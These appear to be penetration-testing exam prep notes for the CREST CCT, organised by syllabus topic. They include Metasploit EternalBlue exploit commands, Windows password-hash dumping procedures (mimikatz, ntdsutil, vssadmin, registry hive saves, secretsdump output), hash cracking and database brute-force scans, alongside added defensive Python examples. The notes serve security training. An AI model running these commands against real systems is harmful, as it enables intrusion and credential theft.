CREST CCT Lab Prep Notes
Long Question Useful
Web Server Counter Measures – p158 2nd Edition
Appendix A: Soft Skills and Assessment Management
A5 Record Keeping, Interim Reporting & Final Results
Understanding reporting requirements. Understanding the importance of accurate and structured record keeping
during the engagement.
Appendix B: Core Technical Skills
B4 Network Mapping & Target Identification
Analysis of output from tools used to map the route between the engagement point and a number of targets.
Network sweeping techniques to prioritise a target list and the potential for false negatives.
B11 Cryptography
Differences between encryption and encoding. Symmetric / asymmetric encryption. Encryption algorithms: DES,
3DES, AES, RSA, RC4. Hashes: SHA1 and MD5. Message integrity codes: HMAC.
Appendix C: Background Information Gathering & Open Source
C3 Customer Web Site Analysis
Analysis of information from a target web site, both from displayed content and from within the HTML source.
Appendix E: Microsoft Windows Security Assessment
E4 Windows Passwords
Password policies (complexity, lockout policies). Account brute forcing. Hash storage (merits of LANMAN, NTLMv1 /
v2). Offline password analysis (rainbow tables / hash brute forcing).
E5 Windows Vulnerabilities
Knowledge of remote Windows vulnerabilities, particularly those for which robust exploit code exists in the public
domain.
Video: MS17-010 – Eternal Blue
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
show options
set RHOSTS 10.10.12.107
exploit
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.12.107
exploit
Metasploit.txt
Metasploit
Start up and Update
Example: Metasploit - Exploiting MS17-010 - Eternalblue Vulnerability
Exploits
search: IIS, RDP
use $exploit
show options | show payloads | show targets
set settings ...
exploit (or run, for auxiliary modules)
Auxiliary Modules
show options, set RHOSTS (and other values such as THREADS, VHOSTS), run
Eternal Blue SMB Remote Windows Kernel Pool Corruption-MS17-010
Knowledge of local windows privilege escalation vulnerabilities and techniques.
Knowledge of common post exploitation activities:
Obtain password hashes, both from the local SAM and cached credentials
HASHES
Hashes are stored in the SAM database on a Windows system, or in the NTDS database on the Domain
Controller.
1. SAM file (need both C:\windows\system32\config\SAM and C:\windows\system32\config\system)
2. Registry (HKEY_LOCAL_MACHINE\Security\Cache for domain credentials, HKEY_LOCAL_MACHINE\SAM for local credentials)
3. Domain Controller: C:\Windows\NTDS\NTDS.dit
4. In-memory (dump with mimikatz) -- however this last one isn't "stored" as in written-to-disk.
LM hashes are the oldest password storage format used by Windows, dating back to OS/2 in the 1980s, and were
turned off by default starting in Windows Vista/Server 2008. It is possible to enable them in later versions
through a GPO setting (even Windows 2016/10).
NTHash is often referred to as the NTLM hash. Version 1 of the protocol uses both the NT and LM hash, depending
on configuration and what is available. NTLMv2 (a different algorithm) has been the default in Windows since
Windows 2000.
OBTAINING THE HASHES
Mimikatz has a feature (dcsync) which uses the Directory Replication Service (DRS) to retrieve the
password hashes from the NTDS.DIT file. It can be executed from any system that is part of the domain, in
the context of a domain administrator.
lsadump::dcsync /domain:pentestlab.local /all /csv
The ntdsutil tool is part of the domain controller ecosystem; its purpose is to enable administrators to
access and manage the Windows Active Directory database.
ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit
Two new folders will be generated: Active Directory and Registry. The NTDS.DIT file will be saved in the
Active Directory and the SAM and SYSTEM files will be saved into the Registry folder.
DiskShadow is a Microsoft-signed binary used to assist administrators with operations related to the
Volume Shadow Copy Service (VSS). It is included in Windows Server 2008, Windows Server 2012 and
Windows Server 2016.
VSSadmin – Comes with Windows servers. vssadmin is a Windows command-line utility which enables
administrators to take backups of computers, volumes and files even if they are in use by the operating
system.
vssadmin list shadows - check whether any shadow copies already exist
vssadmin create shadow /for=C: - create a shadow copy, then copy ntds.dit and SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\SAM1
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\SYSTEM1
NTDS may not exist if you did not dump from a DC.
vssadmin delete shadows /shadow=[GUID] - delete the shadow copy (if you need to run this…)
Then extract using either SamDump2 or impacket.
Can also use Cain to dump the passwords.
Registry and SamDump2
C:\WINDOWS\system32>reg save hklm\sam c:\sam
The operation completed successfully.
C:\WINDOWS\system32>reg save hklm\system c:\system
The operation completed successfully.
C:\WINDOWS\system32>reg save hklm\security c:\security
The operation completed successfully.
The security file contains the cached credentials.
Copy the files to Kali and run SamDump2 (or impacket, which gives more information):
root@Kali:~# samdump2 system sam
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
PWdump - PWdump7 needs to be run as admin.
pwdump7 > hash.txt
Cached Credentials
Having dumped the security hive from registry:
C:\WINDOWS\system32>reg save hklm\security c:\security
The operation completed successfully.
Then from Kali, impacket's secretsdump.py gives the information from SAM and SYSTEM. The file names are sam
and system. If you don't have the security hive you can omit the -security option.
root@Kali:~# python /usr/share/doc/python-impacket/examples/secretsdump.py -sam sam -security security -system system LOCAL
Impacket v0.9.13 - Copyright 2002-2015 Core Security Technologies
[*] Target system bootKey: 0x4e52ab9bfb9019fb6827913377943620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
0000 01 00 00 00 D7 C6 B0 AD 57 36 7C D6 4C 22 3A 59 ........W6|.L":Y
0010 25 9E 19 C8 3F E0 8C E7 FD C5 53 6F B4 84 2E 83 %...?.....So....
0020 3B DB 63 C1 A5 EB FF 3A 05 89 C4 29 ;.c....:...)
[*] NL$KM
0000 5E FD D7 75 81 79 FE B5 B8 09 59 CA D9 68 76 32 ^..u.y....Y..hv2
0010 B4 96 A7 B3 A6 12 66 1D D9 AE C0 ED AE D2 0C B7 ......f.........
0020 6E E7 8E 89 D2 41 BF 92 58 E6 D4 C7 04 54 89 58 n....A..X....T.X
0030 01 EA D5 75 6C 8E EE E6 8C D6 F6 AA 02 12 7A 47 ...ul.........zG
[*] RasDialParams!S-1-5-21-2026301890-2774087781-1233172474-1001#0
0000 35 00 30 00 30 00 39 00 30 00 39 00 33 00 37 00 5.0.0.9.0.9.3.7.
0010 00 00 31 00 36 00 30 00 38 00 00 00 33 00 00 00 ..1.6.0.8...3...
0020 00 00 00 00 44 00 61 00 76 00 69 00 64 00 33 00 ....D.a.v.i.d.3.
0030 30 00 39 00 2D 00 56 00 50 00 4E 00 00 00 40 00 0.9.-.V.P.N...@.
0040 4A 00 61 00 70 00 61 00 6E 00 30 00 31 00 23 00 x.x.x.x.x.x.x.x.
0050 00 00 00 00 30 00 00 00 00 00 ....0.....
[*] Cleaning up...
Obtain locally-stored clear-text password
Crack password hashes
John the Ripper; Cain & Abel is a Windows-based tool with a host of useful features, including a password cracker.
It's normally a good idea to break very weak passwords with a simple dictionary attack and short (5 character) brute
force attack first, then let the Rainbow Tables pick up the rest.
SHA256 Hashing:
kali# echo pearson | sha256sum
901….ba13
Windows password storage does not use a salt, so two users with the same password have identical hashes. In
Linux, because of salting, two users with the same password will have different hashes.
NT password hashes preserve case (mixed case), whereas an LM hash is computed over the upper-cased password.
John the Ripper
John comes with its own dictionary at /usr/share/john/password.lst. You can edit the file to add your own
passwords, or use your own list with --wordlist=/usr/share/john/file.lst.
In the output, the username is on the right-hand side and the cracked password on the left. The number next to
the username tells you which half of the password is being cracked: for LM hashes, if a password is greater than 8
characters it is split into two halves and always made upper case, so the lowercase password "password" would be
stored as PASSWOR and D.
kali# john password-hashes.txt
ACME201 (fireman:2)
The below command will show all passwords that have been cracked:
kali# john --show password-hashes.txt
The hidden directory ~/.john in the home directory stores the .log, .pot and .rec output files.
Change the format to NT cracking (the default is LM hash):
kali# john password-hashes.txt --format=nt
…and then the format also has to be specified in the show command:
kali# john --show password-hashes.txt --format=nt
Hashcat
Hashcat has GPU (graphics card) support, so it is faster, works on Windows and can crack a large variety of hash formats.
hashcat64.exe --potfile-path cracked-passwords.txt -m 3000 password_hashes.txt -a 3
The potfile is where the cracked passwords will be stored, -m 3000 specifies the hash format being cracked
(3000 is for LM hash and 1000 is for NT hash), and -a 3 specifies brute force.
To view the cracked passwords:
hashcat64.exe -m 3000 --potfile-path cracked_passwords.pot password_hashes.txt --show --username
Can use a dictionary attack:
hashcat64.exe --potfile-path cracked_passwords.pot -m 3000 password_hashes.txt
D:\tools\hats\rockyou.txt -r D:\tool\hashcat-3.6.0\rules\InsidePro-PasswordsPro.rule
The rule specifies various mangling rules.
Check patch levels – CREST Exam Notes;
WMIC: wmic qfe list full /format:htable > hotfixes.htm
Powershell (enter powershell) Get-WmiObject -Class "win32_quickfixengineering"
get-hotfix
Linux: Debian or Ubuntu: apt-get upgrade -s | grep -i security
RH: rpm -qa --last
Derive list of missing security patches -
Reversion to previous state: System Restore is a Windows feature that can help fix certain types of crashes
and other computer problems.
Appendix G: Web Technologies
G2 Web Servers & their Flaws
Common web servers and their fundamental differences and vulnerabilities associated with them:
IIS – P372 Network Security Assessment
Apache (and variants) – P373 Network Security Assessment
G4 Web Protocols
Web protocols: HTTP, HTTPS, SOAP.
All HTTP web methods and response codes.
See Exam Notes - Identifying Permitted HTTP Methods, also Web App Notes for Nmap NSE and Metasploit script (p16)
HTTP Header Fields relating to security features
See Web App and Exam Notes
G7 Web Application Servers
Vulnerabilities in common application frameworks, servers and technologies: .NET (p413), J2EE, ColdFusion (p403),
Ruby on Rails (p409) and AJAX.
Chapter 14, Network Security Assessment.
AJAX Security - CS.html DotNet Security - CS.html Ruby on Rails - CS.html
G8 Web APIs
Application interfaces: CGI, ISAPI filters and Apache modules.
G9 Web Sub-Components
Web architecture sub-components: Thin/Thick web clients, servlets and applets, Active X.
Flash Application Testing
.Net Thick Clients
Java Applets
Decompilation of client-side code
Base64 decoding? – Burp Decoder
Appendix H: Web Testing Methodologies
H3 Information Gathering from Web Mark-up
Examples of the type of information available in web page source that may prove useful to an attacker:
Hidden Form Fields – Burp: Proxy > Options > Response Modification: Unhide Hidden Form Fields.
Database Connection Strings
Credentials
Developer Comments
Other included files
Authenticated-only URLs
H4 Authentication Mechanisms
Common pitfalls associated with the design and implementation of application authentication mechanisms.
Useful p180, 2nd Edition
H5 Authorisation Mechanisms
Common pitfalls associated with the design and implementation of application authorisation mechanisms.
H6 Input Validation
The importance of input validation as part of a defensive coding strategy.
How input validation can be implemented and the differences between white listing, black listing and data
sanitisation.
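The three approaches named above behave differently on the same input, and the differences are easiest to see side by side. The Python below is an added example for these notes (not code from the notes): a strict allow-list for a username and an integer field, a naive case-sensitive deny-list that shows why deny-listing is brittle, and HTML output encoding as the sanitisation step. The field names and the username policy are assumptions made for the example.

```python
import html
import re

# Allow-list: the only characters and length a username may have (assumed policy).
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{3,16}")
# Deny-list: a naive, case-sensitive list of "known bad" fragments.
BLOCKED_FRAGMENTS = ("<script", "javascript:")


def allowlist_username(value):
    """Accept only values matching the permitted pattern; reject everything else."""
    return USERNAME_RE.fullmatch(value) is not None


def allowlist_int(value, lo, hi):
    """Typed allow-listing: strict integer syntax first, then a range check. Returns int or None."""
    if re.fullmatch(r"-?\d{1,9}", value) is None:
        return None
    n = int(value)
    return n if lo <= n <= hi else None


def denylist_comment(value):
    """Reject values containing a blocked fragment. Note what it misses: a case variant
    such as '<SCRIPT' passes because the list is case-sensitive."""
    return not any(bad in value for bad in BLOCKED_FRAGMENTS)


def sanitise_for_html(value):
    """Sanitisation / output encoding: keep the data but make it inert in an HTML body or attribute."""
    return html.escape(value, quote=True)


def handle_profile_update(form):
    """Combine them: allow-list the structured fields, encode the free-text one.
    Returns the validated record, or None if a structured field is rejected."""
    if not allowlist_username(form.get("username", "")):
        return None
    age = allowlist_int(form.get("age", ""), 0, 150)
    if age is None:
        return None
    return {"username": form["username"], "age": age,
            "bio_html": sanitise_for_html(form.get("bio", ""))}


if __name__ == "__main__":
    print(denylist_comment("<script>x</script>"), denylist_comment("<SCRIPT>x</SCRIPT>"))
    print(handle_profile_update({"username": "alice_01", "age": "30", "bio": "<i>hi</i>"}))
```

The structured fields never reach a deny-list at all: anything outside the allowed grammar is rejected before it is interpreted, whereas the free-text field is accepted as data and neutralised at output time for the context it will be rendered in.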
H7 Application Fuzzing
Fuzzing and its relevance within web-app penetration testing.
The use of fuzz strings and their potential effects.
Potential dangers of fuzzing web applications.
H9 Use of Cross Site Scripting Attacks
Potential implications of a cross site scripting vulnerability.
Ways in which the technique can be used to benefit an attacker.
H10 Use of Injection Attacks
Potential implications of injection vulnerabilities:
SQL injection
LDAP injection
Code injection
XML injection
Ways in which these techniques can be used to benefit an attacker.
H11 Session Handling
Common pitfalls associated with the design and implementation of session handling mechanisms.
H12 Encryption
Common techniques used for encrypting data in transit and data at rest, either on the client or server side.
Identification and exploitation of encoded values (e.g. Base64), and identification and exploitation of
cryptographic values (e.g. MD5 hashes).
Identification of common SSL vulnerabilities
H13 Source Code Review
Common techniques for identifying and reviewing deficiencies in the areas of security.
Useful table p164, 2nd Edition
Appendix I: Web Testing Techniques
I1 Web Site Structure Discovery
Spidering tools and their relevance in a web application test for discovering linked content.
Forced browsing techniques to discover default or unlinked content -
Web Application Security Methodology and Testing: Directory and File Scanning, also Nikto
Identification of functionality within client-side code
I2 Cross Site Scripting Attacks
Arbitrary JavaScript execution.
Using Cross Site Scripting techniques to obtain sensitive information from other users.
Phishing techniques.
See XSS
I3 SQL Injection
Determine the existence of an SQL injection condition in a web application.
Determine the existence of a blind SQL injection condition in a web application.
Exploit SQL injection to enumerate the database and its structure.
Exploit SQL injection to execute commands on the target server.
See SQL injection
I4 Session ID Attacks
Investigate session handling within a web application.
Harvest and analyse a number of session identifiers for weaknesses.
See Testing Session ID and Token Strength
Useful table p167 2nd Edition
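Analysing a harvested set of session identifiers for weaknesses comes down to a few measurable properties: whether the length is fixed, how large the alphabet is, which positions never change across the sample, whether the varying part is simply a counter, and an upper bound on how many bits of randomness the format could carry. The Python below is an added example for these notes (not code from the notes or from any tool named in them); the weak tokens are constructed, and the strong ones are generated locally with `secrets.token_hex`. The 64-bit threshold in the verdict is an assumed rule of thumb, not a figure from the notes.

```python
import math
import secrets

# Constructed samples: a counter-style token set and a locally generated random set.
WEAK_TOKENS = ["sess1000", "sess1001", "sess1002", "sess1003"]
STRONG_TOKENS = [secrets.token_hex(16) for _ in range(20)]


def common_prefix(tokens):
    """Longest prefix shared by every token."""
    prefix = tokens[0]
    for t in tokens[1:]:
        while not t.startswith(prefix):
            prefix = prefix[:-1]
    return prefix


def is_sequential(tokens):
    """True if, after the shared prefix, the tokens are integers increasing by a constant non-zero step."""
    tails = [t[len(common_prefix(tokens)):] for t in tokens]
    if len(tails) < 2 or not all(tail.isdigit() for tail in tails):
        return False
    values = [int(tail) for tail in tails]
    steps = {b - a for a, b in zip(values, values[1:])}
    return len(steps) == 1 and steps.pop() != 0


def analyse_session_ids(tokens):
    """Summarise a harvested sample of session identifiers."""
    lengths = {len(t) for t in tokens}
    alphabet = set("".join(tokens))
    length = max(lengths)
    # Positions whose character is identical in every token carry no randomness at all.
    static_positions = [i for i in range(min(lengths))
                        if len({t[i] for t in tokens}) == 1]
    varying = length - len(static_positions)
    # Upper bound only: assumes every varying position is uniform over the observed alphabet.
    max_bits = varying * math.log2(len(alphabet)) if alphabet else 0.0
    sequential = is_sequential(tokens)
    weak = sequential or max_bits < 64 or len(static_positions) > length / 2
    return {
        "fixed_length": len(lengths) == 1,
        "length": length,
        "alphabet_size": len(alphabet),
        "static_positions": static_positions,
        "sequential": sequential,
        "max_bits": round(max_bits, 1),
        "verdict": "weak" if weak else "ok",
    }


if __name__ == "__main__":
    print(analyse_session_ids(WEAK_TOKENS))
    print(analyse_session_ids(STRONG_TOKENS))
```

A small sample only bounds the randomness from above; a token set can pass every check here and still be predictable if it is derived from something guessable, so treat the "ok" verdict as "nothing obviously wrong" rather than proof of strength.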
I5 Fuzzing
The concept of fuzzing within a web application testing methodology.
Common fuzzing tools.
I6 Parameter Manipulation
Parameter manipulation techniques, particularly the use of client-side proxies.
I7 Data Confidentiality & Integrity
Identifying weak (or missing) encryption.
Identifying insecure SSL configurations.
Identify insecure use of encoding techniques
I8 Directory Traversal
Identifying directory traversal vulnerabilities within applications.
See RFI and LFI, Path Transversal
I9 File Uploads
Identifying common vulnerabilities with file upload capabilities within applications.
See Uploads.
I10 Code Injection
Investigation and exploitation of code injection vulnerabilities within web applications.
See OS command injection – get Commix working…
I11 CRLF Attacks
Assessment of web applications for CRLF vulnerabilities
See HTTP Testing – Headers
I12 Application Logic Flaws
Assessing the logic flow within an application and the potential for subverting the logic.
Appendix J: Databases
J1 Microsoft SQL Server (p424)
Knowledge of common attack vectors for Microsoft SQL Server. Understanding of privilege escalation and attack
techniques for a system compromised via database connections.
See CREST exam notes
J2 Oracle RDBMS (p426)
Derivation of version and patch information from hosts running Oracle software.
Default Oracle accounts.
See CREST exam notes
J3 Web / App / Database Connectivity
Common databases (MS SQL server, Oracle, MySQL and Access) and the connection and authentication methods
used by web applications
See CREST exam notes
Useful Nmap Scripts
MS SQL
ms-sql-brute.nse - Performs password guessing against Microsoft SQL Server. SQL Server 2005 and later versions
include support for account lockout policies.
MySQL
nmap -p 3306 --script=mysql-info 127.0.0.1 - Connects to a MySQL server and prints information such as
the protocol and version numbers, thread ID, status, capabilities, and the password salt.
nmap -sV -sC <target>
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.0.51a-3ubuntu5.1
| Thread ID: 7
| Capabilities flags: 40968
| Some Capabilities: ConnectWithDatabase, SupportsTransactions, Support41Auth
| Status: Autocommit
|_ Salt: bYytNQ/4V6IN+*3`imj
mysql-enum – Performs valid-user enumeration. Server versions 5.x are susceptible to a user enumeration attack
due to different messages during login when using the old authentication mechanism from versions 4.x and earlier.
mysql-brute – Basic brute force, can be run without word list.
nmap --script=mysql-brute <target>
3306/tcp open mysql
| mysql-brute:
| Accounts
| root:root - Valid credentials
Additional
Identification of more recent SSL vulnerabilities – e.g. BEAST (page 318)
ssl-enum-ciphers - This script repeatedly initiates SSLv3/TLS connections, each time trying a new cipher or
compressor while recording whether a host accepts or rejects it. The end result is a list of all the cipher suites and
compressors that a server accepts.
nmap -sV --script ssl-enum-ciphers -p 443 <host>
POODLE - We can deduce that a server is vulnerable to POODLE if it supports the SSLv3 protocol and uses CBC
ciphers.
BEAST - Any server supporting SSLv3 or TLS 1.0 and using CBC ciphers.
BEAST was indeed an attack on CBC mode with a predictable (in fact known) IV in SSL3 and TLS1.0, because those
protocols used the last block of the previous record, which (usually) has already been sent and seen by the
adversary, as the IV for the next record.
POODLE is not an attack on the IV at all; it is a padding oracle attack on the padding used in SSL3 (and, it turned
out, in some debatably defective TLS1.0 implementations as well), hence the acronym Padding Oracle On Downgraded
Legacy Encryption.
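The two rules above (POODLE: SSLv3 with CBC; BEAST: SSLv3 or TLS 1.0 with CBC) can be applied directly to ssl-enum-ciphers output. The Python below is an added example for these notes (not code from the notes or from Nmap): it parses the protocol/cipher layout that ssl-enum-ciphers prints, then reports the two conditions plus RC4 use and legacy protocol support. The scan text is constructed to match the script's output shape; it is not from a real host.

```python
import re

# Constructed nmap ssl-enum-ciphers output in the script's layout (not a real scan).
SAMPLE_SCAN = """\
443/tcp open  https
| ssl-enum-ciphers:
|   SSLv3:
|     ciphers:
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|       TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C
|     compressors:
|       NULL
|   TLSv1.0:
|     ciphers:
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
|_  least strength: C
"""

PROTO_RE = re.compile(r"^\|_?\s+(SSLv3|TLSv1\.\d):\s*$")
CIPHER_RE = re.compile(r"^\|_?\s+(TLS_[A-Z0-9_]+)")


def parse_ssl_enum_ciphers(output):
    """Return {protocol: [cipher suite names]} from ssl-enum-ciphers text."""
    suites, proto = {}, None
    for line in output.splitlines():
        m = PROTO_RE.match(line)
        if m:
            proto = m.group(1)
            suites[proto] = []
            continue
        m = CIPHER_RE.match(line)
        if m and proto is not None:
            suites[proto].append(m.group(1))
    return suites


def assess_tls(suites):
    """Apply the POODLE and BEAST rules from the notes, and flag RC4 and legacy protocols."""
    def cbc(proto):
        return [c for c in suites.get(proto, []) if "_CBC_" in c]

    return {
        "poodle": bool(cbc("SSLv3")),                       # SSLv3 + CBC
        "beast": bool(cbc("SSLv3") or cbc("TLSv1.0")),      # SSLv3 or TLS 1.0 + CBC
        "rc4_protocols": [p for p, cs in suites.items() if any("_RC4_" in c for c in cs)],
        "legacy_protocols": [p for p in suites if p in ("SSLv3", "TLSv1.0")],
    }


if __name__ == "__main__":
    parsed = parse_ssl_enum_ciphers(SAMPLE_SCAN)
    print(parsed)
    print(assess_tls(parsed))
```

Feeding it the output of `nmap -sV --script ssl-enum-ciphers -p 443 <host>` gives the same verdicts for a real target; removing SSLv3 and TLS 1.0 from the server configuration clears both findings regardless of which CBC suites remain on TLS 1.2.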
Examples.txt
HTTP Header Fields relating to security features – e.g. HSTS
See CREST Notes: HTTP Header Fields relating to security features
Useful p172, 2nd Edition
Strict-Transport-Security.html
Web Server security misconfigurations – e.g. WebDAV - Page 340, 372, and p116 2nd Edition
http-webdav-scan - The script sends an OPTIONS request which lists the dav type, server type, date and allowed
methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal ip addresses by doing
pattern matching in the response body.
nmap --script http-webdav-scan -p80,8080 <target>
Script Output
PORT STATE SERVICE
8008/tcp open http
| http-webdav-scan:
| Allowed Methods: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL, DELETE, TRACE, REPORT
| Server Type: DAV/0.9.8 Python/2.7.6
| Server Date: Fri, 22 May 2015 19:28:00 GMT
| WebDAV type: Unknown
| Directory Listing:
| http://localhost
| http://localhost:8008/WebDAVTest_b1tqTWeyRR
| http://localhost:8008/WebDAVTest_A0QWJb7hcK
| http://localhost:8008/WebDAVTest_hf9Mqqpi1M
|_ http://localhost:8008/WebDAVTest_Ds5KBFywDq
Metasploit has a few modules to test for WebDAV presence.
WebDAV.txt
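Both of the last two items (security-related response headers such as HSTS, and the methods a WebDAV-enabled server advertises in its OPTIONS reply) are header reviews, so one checker serves both. The Python below is an added example for these notes (not code from the notes, from Nmap or from Metasploit): it parses a raw HTTP response, checks for the expected security headers, validates the Strict-Transport-Security directives, and lists any advertised methods that allow content to be written, moved or deleted. The responses are constructed (the Allow list mirrors the scan output above); the one-year HSTS minimum and the set of headers expected are assumed policy for the example.

```python
import re

MIN_HSTS_AGE = 31536000  # one year; an assumed minimum for the example
EXPECTED_HEADERS = ("Strict-Transport-Security", "X-Frame-Options",
                    "X-Content-Type-Options", "Content-Security-Policy")
# Methods that change server content or are rarely needed on a production site.
RISKY_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK", "TRACE"}

# Constructed OPTIONS responses: a permissive WebDAV host and a tightened one.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: DAV/0.9.8 Python/2.7.6\r\n"
    "Allow: GET, HEAD, COPY, MOVE, POST, PUT, PROPFIND, PROPPATCH, OPTIONS, MKCOL, DELETE, TRACE, REPORT\r\n"
    "DAV: 1, 2\r\n"
    "Strict-Transport-Security: max-age=300\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: GET, HEAD, OPTIONS\r\n"
    "Strict-Transport-Security: max-age=63072000; includeSubDomains\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_response(raw):
    """Split a raw HTTP response into (status line, {lower-cased header name: value})."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_hsts(value):
    """Break a Strict-Transport-Security value into its directives."""
    directives = [d.strip() for d in value.split(";")]
    max_age = None
    for d in directives:
        m = re.fullmatch(r"max-age=(\d+)", d, re.IGNORECASE)
        if m:
            max_age = int(m.group(1))
    lowered = {d.lower() for d in directives}
    return {"max_age": max_age,
            "include_subdomains": "includesubdomains" in lowered,
            "preload": "preload" in lowered}


def review_response(raw):
    """Return a list of findings for the headers in a response; empty means nothing flagged."""
    _, headers = parse_response(raw)
    findings = []
    for name in EXPECTED_HEADERS:
        if name.lower() not in headers:
            findings.append(f"missing header: {name}")
    if "strict-transport-security" in headers:
        hsts = parse_hsts(headers["strict-transport-security"])
        if hsts["max_age"] is None or hsts["max_age"] < MIN_HSTS_AGE:
            findings.append(f"HSTS max-age {hsts['max_age']} below {MIN_HSTS_AGE}")
    if "allow" in headers:
        allowed = {m.strip().upper() for m in headers["allow"].split(",")}
        risky = sorted(allowed & RISKY_METHODS)
        if risky:
            findings.append("risky methods allowed: " + ", ".join(risky))
    return findings


if __name__ == "__main__":
    for finding in review_response(SAMPLE_OPTIONS_RESPONSE):
        print(finding)
    print(review_response(HARDENED_RESPONSE))
```

The Allow header only reports what the server advertises; a method can be enabled without being listed, so the OPTIONS check complements rather than replaces a direct test of each method.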
Decompilation of client-side code – e.g. Flash, Java, .Net
Flash
Flash maintains its own cookie store, allowing cookies that can't be deleted directly from the browser.
ActionScript is an open source scripting language that compiles into bytecode and is leveraged both in Adobe
Flash and Apache Flex. The bytecode is executed within an ActionScript Virtual Machine (AVM), which
provides a similar sandbox environment to Java.
Though the ActionScript-compiled bytecode is not human-readable, tools such as SWFScan can turn the
bytecode back into ActionScript.
JPEXS Free Flash Decompiler
Perl Script – SWF-File-0.42
Java
Java code runs in two primary ways: either through standalone Java applications or through web applets.
Applets are Java code specifically designed to run within a web page.
Java has a security model around applets that tries to prevent them from calling malicious code. This
model is also known as the sandbox.
A core difference between a signed applet and an unsigned applet (quarantined within the sandbox) is that a
signed applet can execute code outside of the sandbox.
Actions like accessing the file system or executing operating system commands are blocked by default. The
Java security model requires code to be trusted or permission to be given before accessing functionality that
has security implications.
Java code is compiled into bytecode, resulting in a compiled class file, which is then processed by the JVM.
Reversing Java using JD-GUI – page 391
.Net
JustDecompile
Vulnerabilities in increasingly prevalent application frameworks – e.g. Rails (p409)
Flash Application Testing
Java Applets
.Net Thick Clients
Identification of functionality within client-side code that is accessible only to privileged users